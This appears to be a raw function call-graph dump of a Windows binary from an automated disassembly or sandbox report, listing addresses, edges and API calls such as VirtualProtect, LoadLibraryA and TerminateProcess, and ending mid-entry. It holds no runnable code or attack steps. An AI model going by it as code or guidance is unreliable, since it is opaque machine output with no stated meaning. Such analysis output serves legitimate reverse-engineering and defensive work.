94425 93d298 94421->94425 94424->94418 94426 93d28b 94425->94426 94427 93d2a5 94425->94427 94426->94418 94427->94426 94428 93d2ac RegOpenKeyExW 94427->94428 94428->94426 94429 93d2c6 RegQueryValueExW 94428->94429 94430 93d2e7 94429->94430 94431 93d2fc RegCloseKey 94429->94431 94430->94431 94431->94426 94432 9919dd 94437 924a30 94432->94437 94434 9919f1 94457 940f0a 52 API calls __cinit 94434->94457 94436 9919fb 94438 924a40 __ftell_nolock 94437->94438 94439 92d7f7 48 API calls 94438->94439 94440 924af6 94439->94440 94458 925374 94440->94458 94442 924aff 94465 92363c 94442->94465 94445 92518c 48 API calls 94446 924b18 94445->94446 94471 9264cf 94446->94471 94449 92d7f7 48 API calls 94450 924b32 94449->94450 94477 9249fb 94450->94477 94452 924b43 Mailbox 94452->94434 94453 9261a6 48 API calls 94456 924b3d _wcscat Mailbox __wsetenvp 94453->94456 94454 92ce19 48 API calls 94454->94456 94455 9264cf 48 API calls 94455->94456 94456->94452 94456->94453 94456->94454 94456->94455 94457->94436 94491 94f8a0 94458->94491 94461 92ce19 48 API calls 94462 9253a7 94461->94462 94493 92660f 94462->94493 94464 9253b1 Mailbox 94464->94442 94466 923649 __ftell_nolock 94465->94466 94500 92366c GetFullPathNameW 94466->94500 94468 92365a 94469 926a63 48 API calls 94468->94469 94470 923669 94469->94470 94470->94445 94472 92651b 94471->94472 94476 9264dd _memcpy_s 94471->94476 94474 93f4ea 48 API calls 94472->94474 94473 93f4ea 48 API calls 94475 924b29 94473->94475 94474->94476 94475->94449 94476->94473 94502 92bcce 94477->94502 94480 9941cc RegQueryValueExW 94482 9941e5 94480->94482 94483 994246 RegCloseKey 94480->94483 94481 924a2b 94481->94456 94484 93f4ea 48 API calls 94482->94484 94485 9941fe 94484->94485 94508 9247b7 94485->94508 94488 994224 94489 926a63 48 API calls 94488->94489 94490 99423b 94489->94490 94490->94483 94492 925381 GetModuleFileNameW 94491->94492 94492->94461 94494 94f8a0 __ftell_nolock 94493->94494 94495 92661c GetFullPathNameW 94494->94495 94496 926a63 48 API calls 94495->94496 94497 926643 94496->94497 94498 926571 48 API calls 94497->94498 94499 92664f 94498->94499 94499->94464 94501 92368a 94500->94501 94501->94468 94503 924a0a RegOpenKeyExW 94502->94503 94504 92bce8 94502->94504 94503->94480 94503->94481 94505 93f4ea 48 API calls 94504->94505 94506 92bcf2 94505->94506 94507 93ee75 48 API calls 94506->94507 94507->94503 94509 93f4ea 48 API calls 94508->94509 94510 9247c9 RegQueryValueExW 94509->94510 94510->94488 94510->94490 94511 999bec 94546 930ae0 _memcpy_s Mailbox 94511->94546 94513 93f4ea 48 API calls 94513->94546 94516 93f4ea 48 API calls 94539 92fec8 94516->94539 94518 93146e 94526 926eed 48 API calls 94518->94526 94519 930509 94684 96cc5c 86 API calls 4 library calls 94519->94684 94521 931473 94683 96cc5c 86 API calls 4 library calls 94521->94683 94524 99a246 94528 926eed 48 API calls 94524->94528 94525 99a922 94542 92ffe1 Mailbox 94526->94542 94527 926eed 48 API calls 94527->94539 94528->94542 94531 92d7f7 48 API calls 94531->94539 94532 99a873 94533 99a30e 94533->94542 94679 9597ed InterlockedDecrement 94533->94679 94534 9597ed InterlockedDecrement 94534->94539 94535 92ce19 48 API calls 94535->94546 94536 940f0a 52 API calls __cinit 94536->94539 94538 99a973 94685 96cc5c 86 API calls 4 library calls 94538->94685 94539->94516 94539->94518 94539->94519 94539->94521 94539->94524 94539->94527 94539->94531 94539->94533 94539->94534 94539->94536 94539->94538 94539->94542 94543 9315b5 94539->94543 94676 931820 331 API calls 2 library calls 94539->94676 94677 931d10 59 API calls Mailbox 94539->94677 94541 99a982 94682 96cc5c 86 API calls 4 library calls 94543->94682 94546->94513 94546->94535 94546->94539 94546->94542 94547 99a706 94546->94547 94549 931526 Mailbox 94546->94549 94550 9597ed InterlockedDecrement 94546->94550 94554 92fe30 94546->94554 94583 980d1d 94546->94583 94586 980d09 94546->94586 94589 976ff0 94546->94589 94598 97f0ac 94546->94598 94630 96a6ef 94546->94630 94636 97e822 94546->94636 94678 97ef61 82 API calls 2 library calls 94546->94678 94680 96cc5c 86 API calls 4 library calls 94547->94680 94681 96cc5c 86 API calls 4 library calls 94549->94681 94550->94546 94555 92fe50 94554->94555 94576 92fe7e 94554->94576 94556 93f4ea 48 API calls 94555->94556 94556->94576 94557 93146e 94558 926eed 48 API calls 94557->94558 94579 92ffe1 94558->94579 94559 93f4ea 48 API calls 94559->94576 94560 9315b5 94689 96cc5c 86 API calls 4 library calls 94560->94689 94561 92d7f7 48 API calls 94561->94576 94563 930509 94691 96cc5c 86 API calls 4 library calls 94563->94691 94565 931473 94690 96cc5c 86 API calls 4 library calls 94565->94690 94567 99a246 94570 926eed 48 API calls 94567->94570 94568 99a922 94568->94546 94569 926eed 48 API calls 94569->94576 94570->94579 94573 9597ed InterlockedDecrement 94573->94576 94574 99a873 94574->94546 94575 99a30e 94575->94579 94688 9597ed InterlockedDecrement 94575->94688 94576->94557 94576->94559 94576->94560 94576->94561 94576->94563 94576->94565 94576->94567 94576->94569 94576->94573 94576->94575 94577 940f0a 52 API calls __cinit 94576->94577 94576->94579 94580 99a973 94576->94580 94686 931820 331 API calls 2 library calls 94576->94686 94687 931d10 59 API calls Mailbox 94576->94687 94577->94576 94579->94546 94692 96cc5c 86 API calls 4 library calls 94580->94692 94582 99a982 94693 97f8ae 94583->94693 94585 980d2d 94585->94546 94587 97f8ae 129 API calls 94586->94587 94588 980d19 94587->94588 94588->94546 94590 92936c 81 API calls 94589->94590 94591 97702a 94590->94591 94819 92b470 94591->94819 94593 97703a 94594 97705f 94593->94594 94595 92fe30 331 API calls 94593->94595 94597 977063 94594->94597 94847 92cdb9 48 API calls 94594->94847 94595->94594 94597->94546 94599 92d7f7 48 API calls 94598->94599 94600 97f0c0 94599->94600 94601 92d7f7 48 API calls 94600->94601 94602 97f0c8 94601->94602 94603 92d7f7 48 API calls 94602->94603 94604 97f0d0 94603->94604 94605 92936c 81 API calls 94604->94605 94619 97f0de 94605->94619 94606 926a63 48 API calls 94606->94619 94607 92c799 48 API calls 94607->94619 94608 97f2cc 94609 97f2f9 Mailbox 94608->94609 94874 926b68 48 API calls 94608->94874 94609->94546 94611 97f2b3 94612 92518c 48 API calls 94611->94612 94615 97f2c0 94612->94615 94613 97f2ce 94616 92518c 48 API calls 94613->94616 94614 926eed 48 API calls 94614->94619 94617 92510d 48 API calls 94615->94617 94618 97f2dd 94616->94618 94617->94608 94622 92510d 48 API calls 94618->94622 94619->94606 94619->94607 94619->94608 94619->94609 94619->94611 94619->94613 94619->94614 94620 92bdfa 48 API calls 94619->94620 94623 92bdfa 48 API calls 94619->94623 94627 92936c 81 API calls 94619->94627 94628 92518c 48 API calls 94619->94628 94629 92510d 48 API calls 94619->94629 94621 97f175 CharUpperBuffW 94620->94621 94863 92d645 94621->94863 94622->94608 94625 97f23a CharUpperBuffW 94623->94625 94873 93d922 55 API calls 2 library calls 94625->94873 94627->94619 94628->94619 94629->94619 94631 96a6fb 94630->94631 94632 93f4ea 48 API calls 94631->94632 94633 96a709 94632->94633 94634 92d7f7 48 API calls 94633->94634 94635 96a717 94633->94635 94634->94635 94635->94546 94637 97e84e 94636->94637 94638 97e868 94636->94638 94878 96cc5c 86 API calls 4 library calls 94637->94878 94879 97ccdc 48 API calls 94638->94879 94641 97e871 94642 92fe30 330 API calls 94641->94642 94643 97e8cf 94642->94643 94644 97e916 94643->94644 94645 97e96a 94643->94645 94669 97e860 Mailbox 94643->94669 94880 969b72 48 API calls 94644->94880 94646 97e978 94645->94646 94647 97e9c7 94645->94647 94898 96a69d 48 API calls 94646->94898 94652 92936c 81 API calls 94647->94652 94647->94669 94649 97e949 94881 9345e0 94649->94881 94654 97e9e1 94652->94654 94653 97e99b 94899 92bc74 48 API calls 94653->94899 94656 92bdfa 48 API calls 94654->94656 94658 97ea05 CharUpperBuffW 94656->94658 94657 97e9a3 Mailbox 94900 933200 94657->94900 94660 97ea1f 94658->94660 94661 97ea26 94660->94661 94662 97ea72 94660->94662 94926 969b72 48 API calls 94661->94926 94663 92936c 81 API calls 94662->94663 94664 97ea7a 94663->94664 94927 921caa 49 API calls 94664->94927 94667 97ea54 94668 9345e0 330 API calls 94667->94668 94668->94669 94669->94546 94670 97ea84 94670->94669 94671 92936c 81 API calls 94670->94671 94672 97ea9f 94671->94672 94928 92bc74 48 API calls 94672->94928 94674 97eaaf 94675 933200 330 API calls 94674->94675 94675->94669 94676->94539 94677->94539 94678->94546 94679->94542 94680->94549 94681->94542 94682->94542 94683->94532 94684->94525 94685->94541 94686->94576 94687->94576 94688->94579 94689->94579 94690->94574 94691->94568 94692->94582 94694 92936c 81 API calls 94693->94694 94695 97f8ea 94694->94695 94718 97f92c Mailbox 94695->94718 94729 980567 94695->94729 94697 97fb8b 94698 97fcfa 94697->94698 94702 97fb95 94697->94702 94793 980688 89 API calls Mailbox 94698->94793 94701 97fd07 94701->94702 94703 97fd13 94701->94703 94742 97f70a 94702->94742 94703->94718 94704 92936c 81 API calls 94714 97f984 Mailbox 94704->94714 94709 97fbc9 94756 93ed18 94709->94756 94712 97fbe3 94791 96cc5c 86 API calls 4 library calls 94712->94791 94713 97fbfd 94716 93c050 48 API calls 94713->94716 94714->94697 94714->94704 94714->94718 94789 9829e8 48 API calls _memcpy_s 94714->94789 94790 97fda5 60 API calls 2 library calls 94714->94790 94719 97fc14 94716->94719 94717 97fbee GetCurrentProcess TerminateProcess 94717->94713 94718->94585 94720 931b90 48 API calls 94719->94720 94727 97fc3e 94719->94727 94721 97fc2d 94720->94721 94722 98040f 105 API calls 94721->94722 94722->94727 94724 97fd65 94724->94718 94725 97fd7e FreeLibrary 94724->94725 94725->94718 94727->94724 94760 931b90 94727->94760 94776 98040f 94727->94776 94792 92dcae 50 API calls Mailbox 94727->94792 94730 92bdfa 48 API calls 94729->94730 94731 980582 CharLowerBuffW 94730->94731 94794 961f11 94731->94794 94735 92d7f7 48 API calls 94737 9805bb 94735->94737 94736 98061a Mailbox 94736->94714 94801 9269e9 48 API calls _memcpy_s 94737->94801 94739 9805d2 94740 92b18b 48 API calls 94739->94740 94741 9805de Mailbox 94740->94741 94741->94736 94802 97fda5 60 API calls 2 library calls 94741->94802 94743 97f725 94742->94743 94744 97f77a 94742->94744 94745 93f4ea 48 API calls 94743->94745 94748 980828 94744->94748 94747 97f747 94745->94747 94746 93f4ea 48 API calls 94746->94747 94747->94744 94747->94746 94749 980a53 Mailbox 94748->94749 94755 98084b _strcat _wcscpy __wsetenvp 94748->94755 94749->94709 94750 92cf93 58 API calls 94750->94755 94751 92d286 48 API calls 94751->94755 94752 92936c 81 API calls 94752->94755 94753 94395c 47 API calls __crtGetStringTypeA_stat 94753->94755 94755->94749 94755->94750 94755->94751 94755->94752 94755->94753 94805 968035 50 API calls __wsetenvp 94755->94805 94758 93ed2d 94756->94758 94757 93edc5 VirtualProtect 94759 93ed93 94757->94759 94758->94757 94758->94759 94759->94712 94759->94713 94761 931cf6 94760->94761 94764 931ba2 94760->94764 94761->94727 94762 931bae 94770 931bb9 94762->94770 94807 93c15c 48 API calls 94762->94807 94764->94762 94765 93f4ea 48 API calls 94764->94765 94766 9949c4 94765->94766 94767 93f4ea 48 API calls 94766->94767 94775 9949cf 94767->94775 94768 931c5d 94768->94727 94769 93f4ea 48 API calls 94771 931c9f 94769->94771 94770->94768 94770->94769 94772 931cb2 94771->94772 94806 922925 48 API calls 94771->94806 94772->94727 94774 93f4ea 48 API calls 94774->94775 94775->94762 94775->94774 94777 980427 94776->94777 94782 980443 94776->94782 94778 9804f8 94777->94778 94779 98042e 94777->94779 94780 98044f 94777->94780 94777->94782 94817 969dc5 103 API calls 94778->94817 94814 967c56 50 API calls _strlen 94779->94814 94816 92cdb9 48 API calls 94780->94816 94781 98051e 94781->94727 94782->94781 94808 941c9d 94782->94808 94787 980438 94815 92cdb9 48 API calls 94787->94815 94789->94714 94790->94714 94791->94717 94792->94727 94793->94701 94795 961f3b __wsetenvp 94794->94795 94796 961f79 94795->94796 94798 961f6f 94795->94798 94799 961ffa 94795->94799 94796->94735 94796->94741 94798->94796 94803 93d37a 60 API calls 94798->94803 94799->94796 94804 93d37a 60 API calls 94799->94804 94801->94739 94802->94736 94803->94798 94804->94799 94805->94755 94806->94772 94807->94770 94809 941ca6 RtlFreeHeap 94808->94809 94813 941ccf __dosmaperr 94808->94813 94810 941cbb 94809->94810 94809->94813 94818 947c0e 47 API calls __getptd_noexit 94810->94818 94812 941cc1 GetLastError 94812->94813 94813->94781 94814->94787 94815->94782 94816->94782 94817->94782 94818->94812 94820 926b0f 48 API calls 94819->94820 94842 92b495 94820->94842 94821 92b69b 94850 92ba85 94821->94850 94823 92b6b5 Mailbox 94823->94593 94826 99397b 94861 9626bc 88 API calls 4 library calls 94826->94861 94829 92b9e4 94862 9626bc 88 API calls 4 library calls 94829->94862 94830 993973 94830->94823 94832 92ba85 48 API calls 94832->94842 94834 92bcce 48 API calls 94834->94842 94835 993989 94836 92ba85 48 API calls 94835->94836 94836->94830 94837 993909 94839 926b4a 48 API calls 94837->94839 94838 92bb85 48 API calls 94838->94842 94841 993914 94839->94841 94845 93f4ea 48 API calls 94841->94845 94842->94821 94842->94826 94842->94829 94842->94832 94842->94834 94842->94837 94842->94838 94843 92bdfa 48 API calls 94842->94843 94846 993939 _memcpy_s 94842->94846 94848 92c413 59 API calls 94842->94848 94849 92bc74 48 API calls 94842->94849 94858 92c6a5 49 API calls 94842->94858 94859 92c799 48 API calls _memcpy_s 94842->94859 94844 92b66c CharUpperBuffW 94843->94844 94844->94842 94845->94846 94860 9626bc 88 API calls 4 library calls 94846->94860 94847->94597 94848->94842 94849->94842 94851 92bb25 94850->94851 94854 92ba98 _memcpy_s 94850->94854 94853 93f4ea 48 API calls 94851->94853 94852 93f4ea 48 API calls 94855 92ba9f 94852->94855 94853->94854 94854->94852 94856 92bac8 94855->94856 94857 93f4ea 48 API calls 94855->94857 94856->94823 94857->94856 94858->94842 94859->94842 94860->94830 94861->94835 94862->94830 94864 92d654 94863->94864 94872 92d67e 94863->94872 94865 92d65b 94864->94865 94868 92d6c2 94864->94868 94866 92d6ab 94865->94866 94867 92d666 94865->94867 94866->94872 94876 93dce0 53 API calls 94866->94876 94875 92d9a0 53 API calls __cinit 94867->94875 94868->94866 94877 93dce0 53 API calls 94868->94877 94872->94619 94873->94619 94874->94609 94875->94872 94876->94872 94877->94866 94878->94669 94879->94641 94880->94649 94882 934637 94881->94882 94883 93479f 94881->94883 94884 934643 94882->94884 94885 996e05 94882->94885 94886 92ce19 48 API calls 94883->94886 94979 934300 331 API calls _memcpy_s 94884->94979 94888 97e822 331 API calls 94885->94888 94893 9346e4 Mailbox 94886->94893 94890 996e11 94888->94890 94889 934739 Mailbox 94889->94669 94890->94889 94980 96cc5c 86 API calls 4 library calls 94890->94980 94892 934659 94892->94889 94892->94890 94892->94893 94896 976ff0 331 API calls 94893->94896 94929 96fa0c 94893->94929 94970 924252 94893->94970 94976 966524 94893->94976 94896->94889 94898->94653 94899->94657 95778 92bd30 94900->95778 94902 933267 94908 933313 _memcpy_s Mailbox 94902->94908 95851 93c36b 86 API calls 94902->95851 94906 92d645 53 API calls 94906->94908 94907 96cc5c 86 API calls 94907->94908 94908->94906 94908->94907 94911 92d6e9 55 API calls 94908->94911 94914 92fe30 331 API calls 94908->94914 94916 93c3c3 48 API calls 94908->94916 94920 93f4ea 48 API calls 94908->94920 94921 93c2d6 48 API calls 94908->94921 94922 926eed 48 API calls 94908->94922 94924 92dcae 50 API calls 94908->94924 94925 933635 Mailbox 94908->94925 95783 922b7a 94908->95783 95790 92e8d0 94908->95790 95852 92d9a0 53 API calls __cinit 94908->95852 95853 92d8c0 53 API calls 94908->95853 95854 97f320 331 API calls 94908->95854 95855 97f5ee 331 API calls 94908->95855 95856 921caa 49 API calls 94908->95856 95857 97cda2 82 API calls Mailbox 94908->95857 95858 9680e3 53 API calls 94908->95858 95859 92d764 55 API calls 94908->95859 95860 96c942 50 API calls 94908->95860 94911->94908 94914->94908 94916->94908 94920->94908 94921->94908 94922->94908 94924->94908 94925->94669 94926->94667 94927->94670 94928->94674 94930 96fa1c __ftell_nolock 94929->94930 94931 96fa44 94930->94931 95064 92d286 48 API calls 94930->95064 94933 92936c 81 API calls 94931->94933 94934 96fa5e 94933->94934 94935 96fa80 94934->94935 94936 96fb68 94934->94936 94948 96fb92 94934->94948 94937 92936c 81 API calls 94935->94937 94981 9241a9 94936->94981 94939 96fa8c _wcscpy _wcschr 94937->94939 94949 96fab0 _wcscat _wcscpy 94939->94949 94953 96fade _wcscat 94939->94953 94941 9241a9 136 API calls 94943 96fb8e 94941->94943 94942 92936c 81 API calls 94944 96fbc7 94942->94944 94943->94942 94943->94948 95005 941dfc 94944->95005 94946 92936c 81 API calls 94947 96fafc _wcscpy 94946->94947 95065 9672cb GetFileAttributesW 94947->95065 94948->94889 94951 92936c 81 API calls 94949->94951 94951->94953 94952 96fb1c __wsetenvp 94952->94948 94955 92936c 81 API calls 94952->94955 94953->94946 94954 96fbeb _wcscat _wcscpy 94958 92936c 81 API calls 94954->94958 94956 96fb48 94955->94956 95066 9660dd 77 API calls 4 library calls 94956->95066 94960 96fc82 94958->94960 94959 96fb5c 94959->94948 95008 96690b 94960->95008 94962 96fca2 94963 966524 3 API calls 94962->94963 94964 96fcb1 94963->94964 94965 92936c 81 API calls 94964->94965 94968 96fce2 94964->94968 94966 96fccb 94965->94966 95014 96bfa4 94966->95014 94969 924252 84 API calls 94968->94969 94969->94948 94971 92425c 94970->94971 94975 924263 94970->94975 94972 9435e4 __fcloseall 83 API calls 94971->94972 94972->94975 94973 924272 94973->94889 94974 924283 FreeLibrary 94974->94973 94975->94973 94975->94974 95774 966ca9 GetFileAttributesW 94976->95774 94979->94892 94980->94889 95067 924214 94981->95067 94986 9241d4 LoadLibraryExW 95077 924291 94986->95077 94987 994f73 94988 924252 84 API calls 94987->94988 94990 994f7a 94988->94990 94992 924291 3 API calls 94990->94992 94994 994f82 94992->94994 95103 9244ed 94994->95103 94995 9241fb 94995->94994 94996 924207 94995->94996 94998 924252 84 API calls 94996->94998 94999 92420c 94998->94999 94999->94941 94999->94943 95002 994fa9 95111 924950 95002->95111 95406 941e46 95005->95406 95009 966918 _wcschr __ftell_nolock 95008->95009 95010 96692e _wcscat _wcscpy 95009->95010 95011 941dfc __wsplitpath 47 API calls 95009->95011 95010->94962 95012 96695d 95011->95012 95013 941dfc __wsplitpath 47 API calls 95012->95013 95013->95010 95015 96bfb1 __ftell_nolock 95014->95015 95016 93f4ea 48 API calls 95015->95016 95017 96c00e 95016->95017 95018 9247b7 48 API calls 95017->95018 95019 96c018 95018->95019 95020 96bdb4 GetSystemTimeAsFileTime 95019->95020 95021 96c023 95020->95021 95022 924517 83 API calls 95021->95022 95023 96c036 _wcscmp 95022->95023 95024 96c107 95023->95024 95025 96c05a 95023->95025 95026 96c56d 94 API calls 95024->95026 95462 96c56d 95025->95462 95042 96c0d3 _wcscat 95026->95042 95029 941dfc __wsplitpath 47 API calls 95034 96c088 _wcscat _wcscpy 95029->95034 95030 9244ed 64 API calls 95031 96c12c 95030->95031 95033 9244ed 64 API calls 95031->95033 95032 96c110 95032->94968 95035 96c13c 95033->95035 95037 941dfc __wsplitpath 47 API calls 95034->95037 95036 9244ed 64 API calls 95035->95036 95038 96c157 95036->95038 95037->95042 95039 9244ed 64 API calls 95038->95039 95040 96c167 95039->95040 95041 9244ed 64 API calls 95040->95041 95043 96c182 95041->95043 95042->95030 95042->95032 95044 9244ed 64 API calls 95043->95044 95045 96c192 95044->95045 95046 9244ed 64 API calls 95045->95046 95047 96c1a2 95046->95047 95048 9244ed 64 API calls 95047->95048 95049 96c1b2 95048->95049 95432 96c71a GetTempPathW GetTempFileNameW 95049->95432 95051 96c1be 95052 943499 117 API calls 95051->95052 95058 96c1cf 95052->95058 95054 96c294 95054->95032 95056 96c342 CopyFileW 95054->95056 95057 96c2b8 95054->95057 95055 9244ed 64 API calls 95055->95058 95056->95032 95062 96c32d 95056->95062 95468 96b965 95057->95468 95058->95032 95058->95055 95063 96c289 95058->95063 95433 942aae 95058->95433 95062->95032 95459 96c6d9 CreateFileW 95062->95459 95446 9435e4 95063->95446 95064->94931 95065->94952 95066->94959 95116 924339 95067->95116 95071 924244 FreeLibrary 95072 9241bb 95071->95072 95074 943499 95072->95074 95073 92423c 95073->95071 95073->95072 95124 9434ae 95074->95124 95076 9241c8 95076->94986 95076->94987 95320 9242e4 95077->95320 95080 9242b8 95081 9242c1 FreeLibrary 95080->95081 95082 9241ec 95080->95082 95081->95082 95084 924380 95082->95084 95085 93f4ea 48 API calls 95084->95085 95086 924395 95085->95086 95087 9247b7 48 API calls 95086->95087 95088 9243a1 _memcpy_s 95087->95088 95089 9243dc 95088->95089 95091 9244d1 95088->95091 95092 924499 95088->95092 95090 924950 57 API calls 95089->95090 95096 9243e5 95090->95096 95339 96c750 93 API calls 95091->95339 95328 92406b CreateStreamOnHGlobal 95092->95328 95095 9244ed 64 API calls 95095->95096 95096->95095 95098 924479 95096->95098 95099 994ed7 95096->95099 95334 924517 95096->95334 95098->94995 95100 924517 83 API calls 95099->95100 95101 994eeb 95100->95101 95102 9244ed 64 API calls 95101->95102 95102->95098 95104 994fc0 95103->95104 95105 9244ff 95103->95105 95363 94381e 95105->95363 95108 96bf5a 95383 96bdb4 95108->95383 95110 96bf70 95110->95002 95112 995002 95111->95112 95113 92495f 95111->95113 95388 943e65 95113->95388 95115 924967 95120 92434b 95116->95120 95119 924321 LoadLibraryA GetProcAddress 95119->95073 95121 92422f 95120->95121 95122 924354 LoadLibraryA 95120->95122 95121->95073 95121->95119 95122->95121 95123 924365 GetProcAddress 95122->95123 95123->95121 95126 9434ba _fseek 95124->95126 95125 9434cd 95172 947c0e 47 API calls __getptd_noexit 95125->95172 95126->95125 95128 9434fe 95126->95128 95143 94e4c8 95128->95143 95129 9434d2 95173 946e10 8 API calls __cftog_l 95129->95173 95132 943503 95133 94350c 95132->95133 95134 943519 95132->95134 95174 947c0e 47 API calls __getptd_noexit 95133->95174 95136 943543 95134->95136 95137 943523 95134->95137 95157 94e5e0 95136->95157 95175 947c0e 47 API calls __getptd_noexit 95137->95175 95138 9434dd _fseek @_EH4_CallFilterFunc@8 95138->95076 95144 94e4d4 _fseek 95143->95144 95177 947cf4 95144->95177 95146 94e559 95213 9469d0 47 API calls __crtGetStringTypeA_stat 95146->95213 95147 94e552 95184 94e5d7 95147->95184 95150 94e5cc _fseek 95150->95132 95151 94e560 95151->95147 95152 94e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 95151->95152 95152->95147 95155 94e4e2 95155->95146 95155->95147 95187 947d7c 95155->95187 95211 944e5b 48 API calls __lock 95155->95211 95212 944ec5 LeaveCriticalSection LeaveCriticalSection _doexit 95155->95212 95158 94e600 __wopenfile 95157->95158 95159 94e61a 95158->95159 95171 94e7d5 95158->95171 95227 94185b 59 API calls 2 library calls 95158->95227 95225 947c0e 47 API calls __getptd_noexit 95159->95225 95161 94e61f 95226 946e10 8 API calls __cftog_l 95161->95226 95163 94e838 95222 9563c9 95163->95222 95165 94354e 95176 943570 LeaveCriticalSection LeaveCriticalSection _fprintf 95165->95176 95167 94e7ce 95167->95171 95228 94185b 59 API calls 2 library calls 95167->95228 95169 94e7ed 95169->95171 95229 94185b 59 API calls 2 library calls 95169->95229 95171->95159 95171->95163 95172->95129 95173->95138 95174->95138 95175->95138 95176->95138 95178 947d05 95177->95178 95179 947d18 EnterCriticalSection 95177->95179 95180 947d7c __mtinitlocknum 46 API calls 95178->95180 95179->95155 95181 947d0b 95180->95181 95181->95179 95214 94115b 47 API calls 3 library calls 95181->95214 95215 947e58 LeaveCriticalSection 95184->95215 95186 94e5de 95186->95150 95188 947d88 _fseek 95187->95188 95189 947d91 95188->95189 95190 947da9 95188->95190 95216 9481c2 47 API calls 2 library calls 95189->95216 95192 947da7 95190->95192 95197 947e11 _fseek 95190->95197 95192->95190 95219 9469d0 47 API calls __crtGetStringTypeA_stat 95192->95219 95194 947d96 95217 94821f 47 API calls 8 library calls 95194->95217 95195 947dbd 95198 947dc4 95195->95198 95199 947dd3 95195->95199 95197->95155 95220 947c0e 47 API calls __getptd_noexit 95198->95220 95202 947cf4 __lock 46 API calls 95199->95202 95200 947d9d 95218 941145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95200->95218 95205 947dda 95202->95205 95204 947dc9 95204->95197 95206 947dfe 95205->95206 95207 947de9 InitializeCriticalSectionAndSpinCount 95205->95207 95209 941c9d _free 46 API calls 95206->95209 95208 947e04 95207->95208 95221 947e1a LeaveCriticalSection _doexit 95208->95221 95209->95208 95211->95155 95212->95155 95213->95151 95215->95186 95216->95194 95217->95200 95219->95195 95220->95204 95221->95197 95230 955bb1 95222->95230 95224 9563e2 95224->95165 95225->95161 95226->95165 95227->95167 95228->95169 95229->95171 95233 955bbd _fseek 95230->95233 95231 955bcf 95317 947c0e 47 API calls __getptd_noexit 95231->95317 95233->95231 95235 955c06 95233->95235 95234 955bd4 95318 946e10 8 API calls __cftog_l 95234->95318 95241 955c78 95235->95241 95238 955c23 95319 955c4c LeaveCriticalSection __unlock_fhandle 95238->95319 95240 955bde _fseek 95240->95224 95242 955c98 95241->95242 95243 94273b __wsopen_helper 47 API calls 95242->95243 95246 955cb4 95243->95246 95244 946e20 __invoke_watson 8 API calls 95245 9563c8 95244->95245 95249 955bb1 __wsopen_helper 104 API calls 95245->95249 95247 955d11 95246->95247 95248 955cee 95246->95248 95264 955deb 95246->95264 95255 955dcf 95247->95255 95263 955dad 95247->95263 95251 947bda __dosmaperr 47 API calls 95248->95251 95250 9563e2 95249->95250 95250->95238 95252 955cf3 95251->95252 95253 947c0e __cftog_l 47 API calls 95252->95253 95254 955d00 95253->95254 95256 946e10 __cftog_l 8 API calls 95254->95256 95257 947bda __dosmaperr 47 API calls 95255->95257 95258 955d0a 95256->95258 95259 955dd4 95257->95259 95258->95238 95260 947c0e __cftog_l 47 API calls 95259->95260 95261 955de1 95260->95261 95262 946e10 __cftog_l 8 API calls 95261->95262 95262->95264 95265 94a979 __wsopen_helper 52 API calls 95263->95265 95264->95244 95266 955e7b 95265->95266 95267 955e85 95266->95267 95268 955ea6 95266->95268 95270 947bda __dosmaperr 47 API calls 95267->95270 95269 955b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95268->95269 95280 955ec8 95269->95280 95271 955e8a 95270->95271 95273 947c0e __cftog_l 47 API calls 95271->95273 95272 955f46 GetFileType 95275 955f51 GetLastError 95272->95275 95276 955f93 95272->95276 95274 955e94 95273->95274 95278 947c0e __cftog_l 47 API calls 95274->95278 95279 947bed __dosmaperr 47 API calls 95275->95279 95287 94ac0b __set_osfhnd 48 API calls 95276->95287 95277 955f14 GetLastError 95281 947bed __dosmaperr 47 API calls 95277->95281 95278->95258 95282 955f78 CloseHandle 95279->95282 95280->95272 95280->95277 95283 955b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95280->95283 95284 955f39 95281->95284 95282->95284 95285 955f86 95282->95285 95286 955f09 95283->95286 95288 947c0e __cftog_l 47 API calls 95284->95288 95289 947c0e __cftog_l 47 API calls 95285->95289 95286->95272 95286->95277 95292 955fb1 95287->95292 95288->95264 95290 955f8b 95289->95290 95290->95284 95291 95616c 95291->95264 95294 95633f CloseHandle 95291->95294 95292->95291 95293 94f82f __lseeki64_nolock 49 API calls 95292->95293 95309 956032 95292->95309 95295 95601b 95293->95295 95296 955b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95294->95296 95298 947bda __dosmaperr 47 API calls 95295->95298 95314 95603a 95295->95314 95297 956366 95296->95297 95299 9561f6 95297->95299 95300 95636e GetLastError 95297->95300 95298->95309 95299->95264 95301 947bed __dosmaperr 47 API calls 95300->95301 95302 95637a 95301->95302 95306 94ab1e __free_osfhnd 48 API calls 95302->95306 95303 94ea9c __close_nolock 50 API calls 95303->95314 95304 94ee0e 59 API calls __filbuf 95304->95314 95305 956f40 __chsize_nolock 81 API calls 95305->95314 95306->95299 95307 94af61 __flush 78 API calls 95307->95309 95308 9561e9 95310 94ea9c __close_nolock 50 API calls 95308->95310 95309->95291 95309->95307 95311 94f82f 49 API calls __lseeki64_nolock 95309->95311 95309->95314 95313 9561f0 95310->95313 95311->95309 95312 9561d2 95312->95291 95316 947c0e __cftog_l 47 API calls 95313->95316 95314->95303 95314->95304 95314->95305 95314->95308 95314->95309 95314->95312 95315 94f82f 49 API calls __lseeki64_nolock 95314->95315 95315->95314 95316->95299 95317->95234 95318->95240 95319->95240 95324 9242f6 95320->95324 95323 9242cc LoadLibraryA GetProcAddress 95323->95080 95325 9242aa 95324->95325 95326 9242ff LoadLibraryA 95324->95326 95325->95080 95325->95323 95326->95325 95327 924310 GetProcAddress 95326->95327 95327->95325 95329 9240a2 95328->95329 95330 924085 FindResourceExW 95328->95330 95329->95089 95330->95329 95331 994f16 LoadResource 95330->95331 95331->95329 95332 994f2b SizeofResource 95331->95332 95332->95329 95333 994f3f LockResource 95332->95333 95333->95329 95335 924526 95334->95335 95336 994fe0 95334->95336 95340 943a8d 95335->95340 95338 924534 95338->95096 95339->95089 95341 943a99 _fseek 95340->95341 95342 943aa7 95341->95342 95344 943acd 95341->95344 95353 947c0e 47 API calls __getptd_noexit 95342->95353 95355 944e1c 95344->95355 95345 943aac 95354 946e10 8 API calls __cftog_l 95345->95354 95350 943ae2 95362 943b04 LeaveCriticalSection LeaveCriticalSection _fprintf 95350->95362 95352 943ab7 _fseek 95352->95338 95353->95345 95354->95352 95356 